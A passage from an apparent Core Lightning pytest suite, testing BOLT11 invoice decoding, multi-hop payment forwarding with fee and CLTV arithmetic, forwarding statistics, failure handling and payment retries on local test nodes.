# * `q5`: `data_length` (`q` = 0, `5` = 20; 0 * 32 + 20 == 20)
# * `vdhkven9v5sxyetpdees`: 'coffee beans'
# * `9`: features
# * `qz`: `data_length` (`q` = 0, `z` = 2; 0 * 32 + 2 == 2)
# * `sz`: b1000000010
# * `e992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq`: signature
# * `73t7cl`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9qzsze992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq73t7cl')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 25 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(25 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == 'coffee beans'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert b11['features'] == '0202'
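# Sketch of why the feature string is '0202': bits 1 and 9 set is
# 0b1000000010 == 0x202 (assumption: lightningd renders the feature bitmap
# as big-endian hex padded to whole bytes).
assert '{:04x}'.format(0b1000000010) == '0202'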
# > # Same, but using invalid unknown feature 100
# > lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9q4pqqqqqqqqqqqqqqqqqqszk3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sphzfxz7
#
# Breakdown:
#
# * `lnbc`: prefix, Lightning on Bitcoin mainnet
# * `25m`: amount (25 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
# * `q5`: `data_length` (`q` = 0, `5` = 20; 0 * 32 + 20 == 20)
# * `vdhkven9v5sxyetpdees`: 'coffee beans'
# * `9`: features
# * `q4`: `data_length` (`q` = 0, `4` = 21; 0 * 32 + 21 == 21)
# * `pqqqqqqqqqqqqqqqqqqsz`: b00001...(90 zeroes)...1000000010
# * `k3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sp`: signature
# * `hzfxz7`: Bech32 checksum
with pytest.raises(RpcError, match='unknown feature.*100'):
l1.rpc.decodepay('lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9q4pqqqqqqqqqqqqqqqqqqszk3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sphzfxz7')
# Example of an invoice without a multiplier suffix to the amount. This
# should then be interpreted as 7 BTC according to the spec:
#
# `amount`: optional number in that currency, followed by an optional
# `multiplier` letter. The unit encoded here is the 'social' convention of
# a payment unit -- in the case of Bitcoin the unit is 'bitcoin' NOT
# satoshis.
b11 = "lnbcrt71p0g4u8upp5xn4k45tsp05akmn65s5k2063d5fyadhjse9770xz5sk7u4x6vcmqdqqcqzynxqrrssx94cf4p727jamncsvcd8m99n88k423ruzq4dxwevfatpp5gx2mksj2swshjlx4pe3j5w9yed5xjktrktzd3nc2a04kq8yu84l7twhwgpxjn3pw"
b11 = l1.rpc.decodepay(b11)
sat_per_btc = 10**8
assert(b11['msatoshi'] == 7 * sat_per_btc * 1000)
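# The same expectation spelled out directly: 7 BTC at 10**11 msat per BTC.
assert 7 * sat_per_btc * 1000 == 7 * 10**11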
with pytest.raises(RpcError):
l1.rpc.decodepay('1111111')
@pytest.mark.developer("Too slow without --dev-fast-gossip")
def test_forward(node_factory, bitcoind):
# Connect 1 -> 2 -> 3.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
# If they're at different block heights we can get spurious errors.
sync_blockheight(bitcoind, [l1, l2, l3])
chanid1 = only_one(l1.rpc.getpeer(l2.info['id'])['channels'])['short_channel_id']
chanid2 = only_one(l2.rpc.getpeer(l3.info['id'])['channels'])['short_channel_id']
assert only_one(l2.rpc.getpeer(l1.info['id'])['channels'])['short_channel_id'] == chanid1
assert only_one(l3.rpc.getpeer(l2.info['id'])['channels'])['short_channel_id'] == chanid2
rhash = l3.rpc.invoice(100000000, 'testpayment1', 'desc')['payment_hash']
assert only_one(l3.rpc.listinvoices('testpayment1')['invoices'])['status'] == 'unpaid'
# Fee for node2 is 10 millionths, plus 1.
amt = 100000000
fee = amt * 10 // 1000000 + 1
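# Worked example of the formula above: per the comment, node2 charges
# 10 millionths plus a 1 msat base, so on 100000000 msat the proportional
# part is 1000 msat and the total fee is 1001 msat.
assert 100000000 * 10 // 1000000 + 1 == 1001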
baseroute = [{'msatoshi': amt + fee,
'id': l2.info['id'],
'delay': 12,
'channel': chanid1},
{'msatoshi': amt,
'id': l3.info['id'],
'delay': 6,
'channel': chanid2}]
# Unknown other peer
route = copy.deepcopy(baseroute)
route[1]['id'] = '031a8dc444e41bb989653a4501e11175a488a57439b0c4947704fd6e3de5dca607'
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Delay too short (we always add one internally anyway, so subtract 2 here).
route = copy.deepcopy(baseroute)
route[0]['delay'] = 8
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Final delay too short
route = copy.deepcopy(baseroute)
route[1]['delay'] = 3
l1.rpc.sendpay(route, rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# This one works
route = copy.deepcopy(baseroute)
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
@pytest.mark.developer("needs --dev-fast-gossip")
def test_forward_different_fees_and_cltv(node_factory, bitcoind):
# FIXME: Check BOLT quotes here too
# BOLT #7:
# ```
# B
# / \
# / \
# A C
# \ /
# \ /
# D
# ```
#
# Each advertises the following `cltv_expiry_delta` on its end of every
# channel:
#
# 1. A: 10 blocks
# 2. B: 20 blocks
# 3. C: 30 blocks
# 4. D: 40 blocks
#
# C also uses a minimum `cltv_expiry` of 9 (the default) when requesting
# payments.
#
# Also, each node has the same fee scheme which it uses for each of its
# channels:
#
# 1. A: 100 base + 1000 millionths
# 1. B: 200 base + 2000 millionths
# 1. C: 300 base + 3000 millionths
# 1. D: 400 base + 4000 millionths
# We don't do D yet.
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'cltv-delta': 10, 'fee-base': 100, 'fee-per-satoshi': 1000},
{'cltv-delta': 20, 'fee-base': 200, 'fee-per-satoshi': 2000},
{'cltv-delta': 30, 'cltv-final': 9, 'fee-base': 300, 'fee-per-satoshi': 3000}])
ret = l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert ret['id'] == l2.info['id']
l1.daemon.wait_for_log('Handed peer, entering loop')
l2.daemon.wait_for_log('Handed peer, entering loop')
ret = l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
assert ret['id'] == l3.info['id']
l2.daemon.wait_for_log('Handed peer, entering loop')
l3.daemon.wait_for_log('Handed peer, entering loop')
c1, _ = l1.fundchannel(l2, 10**6)
c2, _ = l2.fundchannel(l3, 10**6)
bitcoind.generate_block(5)
# Make sure l1 has seen announce for all channels.
l1.wait_channel_active(c1)
l1.wait_channel_active(c2)
# BOLT #7:
#
# If B were to send 4,999,999 millisatoshi directly to C, it wouldn't
# charge itself a fee nor add its own `cltv_expiry_delta`, so it would
# use C's requested `cltv_expiry` of 9. We also assume it adds a
# "shadow route" to give an extra CLTV of 42. It could also add extra
# cltv deltas at other hops, as these values are a minimum, but we don't
# here for simplicity:
# FIXME: Add shadow route
shadow_route = 0
route = l2.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 1
# BOLT #7:
#
# * `amount_msat`: 4999999
# * `cltv_expiry`: current-block-height + 9 + 42
# * `onion_routing_packet`:
# * `amt_to_forward` = 4999999
# * `outgoing_cltv_value` = current-block-height + 9 + 42
#
assert route[0]['msatoshi'] == 4999999
assert route[0]['delay'] == 9 + shadow_route
# BOLT #7:
# If A were to send 4,999,999 millisatoshi to C via B, it needs to
# pay B the fee it specified in the B->C `channel_update`, calculated as
# per [HTLC Fees](#htlc_fees):
#
# 200 + 4999999 * 2000 / 1000000 = 10199
#
# Similarly, it would need to add the `cltv_expiry` from B->C's
# `channel_update` (20), plus C's requested minimum (9), plus 42 for the
# "shadow route". Thus the `update_add_htlc` message from A to B would
# be:
#
# * `amount_msat`: 5010198
# * `cltv_expiry`: current-block-height + 20 + 9 + 42
# * `onion_routing_packet`:
# * `amt_to_forward` = 4999999
# * `outgoing_cltv_value` = current-block-height + 9 + 42
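# Worked arithmetic for the fee quoted above (a sketch of the HTLC fee
# formula fee_base_msat + amount * fee_proportional_millionths // 1000000):
assert 200 + 4999999 * 2000 // 1000000 == 10199
assert 4999999 + 10199 == 5010198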
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5010198
assert route[0]['delay'] == 20 + 9 + shadow_route
assert route[1]['msatoshi'] == 4999999
assert route[1]['delay'] == 9 + shadow_route
rhash = l3.rpc.invoice(4999999, 'test_forward_different_fees_and_cltv', 'desc')['payment_hash']
assert only_one(l3.rpc.listinvoices('test_forward_different_fees_and_cltv')['invoices'])['status'] == 'unpaid'
# This should work.
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
# We add one to the blockcount for a bit of fuzz (FIXME: Shadowroute would fix this!)
shadow_route = 1
l1.daemon.wait_for_log("Adding HTLC 0 amount=5010198msat cltv={} gave CHANNEL_ERR_ADD_OK"
.format(bitcoind.rpc.getblockcount() + 20 + 9 + shadow_route))
l2.daemon.wait_for_log("Adding HTLC 0 amount=4999999msat cltv={} gave CHANNEL_ERR_ADD_OK"
.format(bitcoind.rpc.getblockcount() + 9 + shadow_route))
l3.daemon.wait_for_log("Resolved invoice 'test_forward_different_fees_and_cltv' with amount 4999999msat")
assert only_one(l3.rpc.listinvoices('test_forward_different_fees_and_cltv')['invoices'])['status'] == 'paid'
# Check that we see all the channels
shortids = set(c['short_channel_id'] for c in l2.rpc.listchannels()['channels'])
for scid in shortids:
c = l1.rpc.listchannels(scid)['channels']
# We get one entry for each direction.
assert len(c) == 2
assert c[0]['short_channel_id'] == scid
assert c[1]['short_channel_id'] == scid
assert c[0]['source'] == c[1]['destination']
assert c[1]['source'] == c[0]['destination']
@pytest.mark.developer("too slow without --dev-fast-gossip")
def test_forward_pad_fees_and_cltv(node_factory, bitcoind):
"""Test that we are allowed extra locktime delta, and fees"""
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'cltv-delta': 10, 'fee-base': 100, 'fee-per-satoshi': 1000},
{'cltv-delta': 20, 'fee-base': 200, 'fee-per-satoshi': 2000},
{'cltv-delta': 30, 'cltv-final': 9, 'fee-base': 300, 'fee-per-satoshi': 3000}])
ret = l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert ret['id'] == l2.info['id']
l1.daemon.wait_for_log('Handed peer, entering loop')
l2.daemon.wait_for_log('Handed peer, entering loop')
ret = l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
assert ret['id'] == l3.info['id']
l2.daemon.wait_for_log('Handed peer, entering loop')
l3.daemon.wait_for_log('Handed peer, entering loop')
c1, _ = l1.fundchannel(l2, 10**6)
c2, _ = l2.fundchannel(l3, 10**6)
bitcoind.generate_block(5)
# Make sure l1 has seen announce for all channels.
l1.wait_channel_active(c1)
l1.wait_channel_active(c2)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5010198
assert route[0]['delay'] == 20 + 9
assert route[1]['msatoshi'] == 4999999
assert route[1]['delay'] == 9
# Modify so we overpay, overdo the cltv.
route[0]['msatoshi'] += 2000
route[0]['amount_msat'] = Millisatoshi(route[0]['msatoshi'])
route[0]['delay'] += 20
route[1]['msatoshi'] += 1000
route[1]['amount_msat'] = Millisatoshi(route[1]['msatoshi'])
route[1]['delay'] += 10
# This should work.
rhash = l3.rpc.invoice(4999999, 'test_forward_pad_fees_and_cltv', 'desc')['payment_hash']
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
assert only_one(l3.rpc.listinvoices('test_forward_pad_fees_and_cltv')['invoices'])['status'] == 'paid'
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
def test_forward_stats(node_factory, bitcoind):
"""Check that we track forwarded payments correctly.
We wire up the network to have l1 as payment initiator, l2 as
forwarder (the one we check) and l3-l5 as payment recipients. l3
accepts correctly, l4 rejects (because it doesn't know the payment
hash) and l5 keeps the HTLC dangling by ignoring it.
"""
amount = 10**5
l1, l2, l3, l4, l5 = node_factory.get_nodes(5, opts=[{}] * 4 + [{'may_fail': True}])
node_factory.join_nodes([l1, l2, l3], wait_for_announce=False)
l2.openchannel(l4, 10**6, wait_for_announce=False)
l2.openchannel(l5, 10**6, wait_for_announce=False)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5])
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
payment_hash = l3.rpc.invoice(amount, "first", "desc")['payment_hash']
route = l1.rpc.getroute(l3.info['id'], amount, 1)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
# l4 rejects since it doesn't know the payment_hash
route = l1.rpc.getroute(l4.info['id'], amount, 1)['route']
payment_hash = "F" * 64
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
# l5 will hold the HTLC hostage.
l5.rpc.dev_ignore_htlcs(id=l2.info['id'], ignore=True)
route = l1.rpc.getroute(l5.info['id'], amount, 1)['route']
payment_hash = l5.rpc.invoice(amount, "first", "desc")['payment_hash']
l1.rpc.sendpay(route, payment_hash)
l5.daemon.wait_for_log(r'their htlc .* dev_ignore_htlcs')
# Select all forwardings, ordered by htlc_id to ensure the order
# matches below
forwardings = l2.db_query("SELECT *, in_msatoshi - out_msatoshi as fee "
"FROM forwarded_payments "
"ORDER BY in_htlc_id;")
assert(len(forwardings) == 3)
states = [f['state'] for f in forwardings]
assert(states == [1, 2, 0]) # settled, failed, offered
inchan = l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'][0]
outchan = l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]
# Check that we correctly account channel changes
assert inchan['in_payments_offered'] == 3
assert inchan['in_payments_fulfilled'] == 1
assert inchan['in_msatoshi_offered'] >= 3 * amount
assert inchan['in_msatoshi_fulfilled'] >= amount
assert outchan['out_payments_offered'] == 1
assert outchan['out_payments_fulfilled'] == 1
assert outchan['out_msatoshi_offered'] >= amount
assert outchan['out_msatoshi_offered'] == outchan['out_msatoshi_fulfilled']
assert outchan['out_msatoshi_fulfilled'] < inchan['in_msatoshi_fulfilled']
stats = l2.rpc.listforwards()
assert [f['status'] for f in stats['forwards']] == ['settled', 'failed', 'offered']
assert l2.rpc.getinfo()['msatoshi_fees_collected'] == 1 + amount // 100000
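# With amount = 10**5 msat this is 2 msat: a 1 msat base fee plus a
# proportional fee of amount // 100000 == 1 msat (assumption: the same
# 10-millionths fee scheme used elsewhere in these tests).
assert 1 + 10**5 // 100000 == 2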
assert l1.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert l3.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert stats['forwards'][0]['received_time'] <= stats['forwards'][0]['resolved_time']
assert stats['forwards'][1]['received_time'] <= stats['forwards'][1]['resolved_time']
assert 'received_time' in stats['forwards'][2] and 'resolved_time' not in stats['forwards'][2]
@pytest.mark.developer("too slow without --dev-fast-gossip")
@pytest.mark.slow_test
def test_forward_local_failed_stats(node_factory, bitcoind, executor):
"""Check that we track forwarded payments correctly.
We wire up the network to have l1 and l6 as payment initiators, l2 as
forwarder (the one we check) and l3-l5 as payment recipients.
There are 5 cases for FORWARD_LOCAL_FAILED status:
1. When Master resolves the reply about the next peer info (sent
by Gossipd) and needs to handle an unknown next peer failure in
channel_resolve_reply(). For this case, we ask l1 to pay l3
through l2 but close the channel between l2 and l3 after
getroute(), so the payment fails in l2 because of
WIRE_UNKNOWN_NEXT_PEER;
2. When Master handles the forward process with the htlc_in and
the id of the next hop, it tries to drive a new htlc_out but fails
in forward_htlc(). For this case, we ask l1 to pay l4 through l2
with no fee, so the payment fails in l2 because of
WIRE_FEE_INSUFFICIENT;
3. When we send htlc_out, Master asks Channeld to add a new htlc
into the outgoing channel but Channeld fails. Master needs to
handle and store this failure in rcvd_htlc_reply(). For this
case, we ask l1 to pay l5 10**8 msat through the channel
(l2-->l5), which only has a capacity of 3 * 10**4 sat, so the
payment fails in l2 because of CHANNEL_ERR_MAX_HTLC_VALUE_EXCEEDED;
4. When Channeld receives a new revoke message, if the state of
the corresponding htlc is RCVD_ADD_ACK_REVOCATION, Master tries
to resolve the onionpacket and handle the failure before resolving
the next hop in peer_got_revoke(). For this case, we ask l6 to pay
l4 through l1 and l2, but we replace the second node_id in the route
with a wrong one, so the payment fails in l2 because of
WIRE_INVALID_ONION_KEY;
5. When Onchaind finds the htlc timed out or missing, Master
needs to handle the failure as FORWARD_LOCAL_FAILED if it is a
forwarded payment. For this case, we ask l1 to pay l4 through l2
with an amount less than the invoice (the payment must fail in l4),
and l4 disconnects before sending update_fail_htlc, so the htlc is
held until l2 hits the timeout and handles it as a local failure.
"""
amount = 10**8
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2, l3, l4, l5, l6 = node_factory.get_nodes(6, opts=[{},
{},
{},
{'disconnect': disconnects},
{},
{}])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
l2.rpc.connect(l5.info['id'], 'localhost', l5.port)
l6.rpc.connect(l1.info['id'], 'localhost', l1.port)
c12, _ = l1.fundchannel(l2, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
c24, _ = l2.fundchannel(l4, 10**6)
c25, _ = l2.fundchannel(l5, 10**4 * 3)
l6.fundchannel(l1, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
l1.wait_channel_active(c24)
l1.wait_channel_active(c25)
l6.wait_channel_active(c24)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 10)
"""1. When Master resolves the reply about the next peer info (sent
by Gossipd) and needs to handle an unknown next peer failure in
channel_resolve_reply();
For this case, we ask l1 to pay l3 through l2 but close the channel
between l2 and l3 after getroute(), so the payment fails in l2
because of WIRE_UNKNOWN_NEXT_PEER;
"""
payment_hash = l3.rpc.invoice(amount, "first", "desc")['payment_hash']
route = l1.rpc.getroute(l3.info['id'], amount, 1)['route']
l2.rpc.close(c23, 1)
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""2. When Master handles the forward process with the htlc_in and
the id of the next hop, it tries to drive a new htlc_out but fails
in forward_htlc();
For this case, we ask l1 to pay l4 through l2 with no fee, so the
payment fails in l2 because of WIRE_FEE_INSUFFICIENT;
"""
payment_hash = l4.rpc.invoice(amount, "third", "desc")['payment_hash']
fee = amount * 10 // 1000000 + 1
route = [{'msatoshi': amount,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount,
'id': l4.info['id'],
'delay': 6,
'channel': c24}]
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""3. When we send htlc_out, Master asks Channeld to add a new htlc
into the outgoing channel but Channeld fails. Master needs to
handle and store this failure in rcvd_htlc_reply();
For this case, we ask l1 to pay l5 10**8 msat through the channel
(l2-->l5), which only has a capacity of 3 * 10**4 sat, so the
payment fails in l2 because of CHANNEL_ERR_MAX_HTLC_VALUE_EXCEEDED;
"""
payment_hash = l5.rpc.invoice(amount, "second", "desc")['payment_hash']
fee = amount * 10 // 1000000 + 1
route = [{'msatoshi': amount + fee,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount,
'id': l5.info['id'],
'delay': 6,
'channel': c25}]
with pytest.raises(RpcError):
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash)
"""4. When Channeld receives a new revoke message, if the state of
corresponding htlc is RCVD_ADD_ACK_REVOCATION, Master tries
to resolve the onionpacket and handle the failure before resolving
the next hop in peer_got_revoke();
For this case, we ask l6 to pay l4 through l1 and l2, but we replace
the second node_id in the route with a wrong one, so the payment
fails in l2 because of WIRE_INVALID_ONION_KEY;
"""
payment_hash = l4.rpc.invoice(amount, 'fourth', 'desc')['payment_hash']
route = l6.rpc.getroute(l4.info['id'], amount, 1)['route']
mangled_nodeid = '0265b6ab5ec860cd257865d61ef0bbf5b3339c36cbda8b26b74e7f1dca490b6510'
# Replace id with a different pubkey, so onion encoded badly at l2 hop.
route[1]['id'] = mangled_nodeid
with pytest.raises(RpcError):
l6.rpc.sendpay(route, payment_hash)
l6.rpc.waitsendpay(payment_hash)
"""5. When Onchaind finds the htlc timed out or missing, Master
needs to handle the failure as FORWARD_LOCAL_FAILED if it is a
forwarded payment.
For this case, we ask l1 to pay l4 through l2 with an amount less than
the invoice (the payment must fail in l4), and l4 disconnects before
sending update_fail_htlc, so the htlc is held until l2 hits the
timeout and handles it as a local failure.
"""
payment_hash = l4.rpc.invoice(amount, 'onchain_timeout', 'desc')['payment_hash']
fee = amount * 10 // 1000000 + 1
# We underpay, so it fails.
route = [{'msatoshi': amount + fee - 1,
'id': l2.info['id'],
'delay': 12,
'channel': c12},
{'msatoshi': amount - 1,
'id': l4.info['id'],
'delay': 5,
'channel': c24}]
executor.submit(l1.rpc.sendpay, route, payment_hash)
l4.daemon.wait_for_log('permfail')
l4.wait_for_channel_onchain(l2.info['id'])
l2.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l4.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l2.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l4.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
# give time to let l2 store the local_failed stats
time.sleep(5)
# Select all forwardings, and check the status
stats = l2.rpc.listforwards()
assert [f['status'] for f in stats['forwards']] == ['local_failed', 'local_failed', 'local_failed', 'local_failed', 'local_failed']
assert l2.rpc.getinfo()['msatoshi_fees_collected'] == 0
assert 'received_time' in stats['forwards'][0] and 'resolved_time' not in stats['forwards'][0]
assert 'received_time' in stats['forwards'][1] and 'resolved_time' not in stats['forwards'][1]
assert 'received_time' in stats['forwards'][2] and 'resolved_time' not in stats['forwards'][2]
assert 'received_time' in stats['forwards'][3] and 'resolved_time' not in stats['forwards'][3]
assert 'received_time' in stats['forwards'][4] and 'resolved_time' not in stats['forwards'][4]
@pytest.mark.developer("too slow without --dev-fast-gossip")
@pytest.mark.slow_test
def test_htlcs_cltv_only_difference(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4
# l4 ignores htlcs, so they stay.
# l3 will see a reconnect from l4 when l4 restarts.
l1, l2, l3, l4 = node_factory.line_graph(4, wait_for_announce=True, opts=[{}] * 2 + [{'dev-no-reconnect': None, 'may_reconnect': True}] * 2)
h = l4.rpc.invoice(msatoshi=10**8, label='x', description='desc')['payment_hash']
l4.rpc.dev_ignore_htlcs(id=l3.info['id'], ignore=True)
# L2 tries to pay
r = l2.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l2.rpc.sendpay(r, h)
# Now increment CLTV
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# L1 tries to pay
r = l1.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l1.rpc.sendpay(r, h)
# Now increment CLTV
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# L3 tries to pay
r = l3.rpc.getroute(l4.info['id'], 10**8, 1)["route"]
l3.rpc.sendpay(r, h)
# Give them time to go through.
time.sleep(5)
# Will all be connected OK.
assert only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']
assert only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected']
assert only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['connected']
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
l4.daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
# Restarting tail node will stop it ignoring HTLCs (it will actually
# fail them immediately).
l4.restart()
l3.rpc.connect(l4.info['id'], 'localhost', l4.port)
wait_for(lambda: only_one(l1.rpc.listsendpays()['payments'])['status'] == 'failed')
wait_for(lambda: only_one(l2.rpc.listsendpays()['payments'])['status'] == 'failed')
wait_for(lambda: only_one(l3.rpc.listsendpays()['payments'])['status'] == 'failed')
# Should all still be connected.
assert only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected']
assert only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected']
assert only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['connected']
def test_pay_variants(node_factory):
l1, l2 = node_factory.line_graph(2)
# Upper case is allowed
b11 = l2.rpc.invoice(123000, 'test_pay_variants upper', 'description')['bolt11'].upper()
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
# lightning: prefix is allowed
b11 = 'lightning:' + l2.rpc.invoice(123000, 'test_pay_variants with prefix', 'description')['bolt11']
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
# Both at once (upper case plus the lightning: prefix) is allowed.
b11 = 'LIGHTNING:' + l2.rpc.invoice(123000, 'test_pay_variants upper with prefix', 'description')['bolt11'].upper()
l1.rpc.decodepay(b11)
l1.rpc.pay(b11)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
@pytest.mark.slow_test
def test_pay_retry(node_factory, bitcoind, executor, chainparams):
"""Make sure pay command retries properly. """
def exhaust_channel(opener, peer, scid, already_spent=0):
"""Spend all available capacity (10^6 - 1%) of channel
"""
peer_node = opener.rpc.listpeers(peer.info['id'])['peers'][0]
chan = peer_node['channels'][0]
maxpay = chan['spendable_msatoshi']
lbl = ''.join(random.choice(string.ascii_letters) for _ in range(20))
inv = peer.rpc.invoice(maxpay, lbl, "exhaust_channel")
routestep = {
'msatoshi': maxpay,
'id': peer.info['id'],
'delay': 10,
'channel': scid
}
opener.rpc.sendpay([routestep], inv['payment_hash'])
opener.rpc.waitsendpay(inv['payment_hash'])
# We connect every node to l5; in a line and individually.
# Keep fixed fees so we can easily calculate exhaustion
l1, l2, l3, l4, l5 = node_factory.line_graph(5, fundchannel=False,
opts={'feerates': (7500, 7500, 7500, 7500), 'disable-mpp': None})
# scid12
l1.fundchannel(l2, 10**6, wait_for_active=False)
# scid23
l2.fundchannel(l3, 10**6, wait_for_active=False)
# scid34
l3.fundchannel(l4, 10**6, wait_for_active=False)
scid45, _ = l4.fundchannel(l5, 10**6, wait_for_active=False)
l1.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid15, _ = l1.fundchannel(l5, 10**6, wait_for_active=False)
l2.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid25, _ = l2.fundchannel(l5, 10**6, wait_for_active=False)
l3.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid35, _ = l3.fundchannel(l5, 10**6, wait_for_active=False)
# Make sure l1 sees all 7 channels
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 14)
# Exhaust shortcut channels one at a time, to force retries.
exhaust_channel(l1, l5, scid15)
exhaust_channel(l2, l5, scid25)
exhaust_channel(l3, l5, scid35)
def listpays_nofail(b11):
while True:
pays = l1.rpc.listpays(b11)['pays']
if len(pays) != 0:
if only_one(pays)['status'] == 'complete':
return
assert only_one(pays)['status'] != 'failed'
inv = l5.rpc.invoice(10**8, 'test_retry', 'test_retry')
# Make sure listpays doesn't transiently show failure while pay
# is retrying.
fut = executor.submit(listpays_nofail, inv['bolt11'])
# Pay l1->l5 should succeed via straight line (eventually)
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
# This should be OK.
fut.result()
# This should make it fail.
exhaust_channel(l4, l5, scid45, 10**8)
# It won't try l1->l5, since it knows that's under capacity.
# It will try l1->l2->l5, which fails.
# It will try l1->l2->l3->l5, which fails.
# It will try l1->l2->l3->l4->l5, which fails.
# Finally, fails to find a route.
inv = l5.rpc.invoice(10**8, 'test_retry2', 'test_retry2')['bolt11']
with pytest.raises(RpcError, match=r'4 attempts'):
l1.rpc.dev_pay(inv, use_shadow=False)
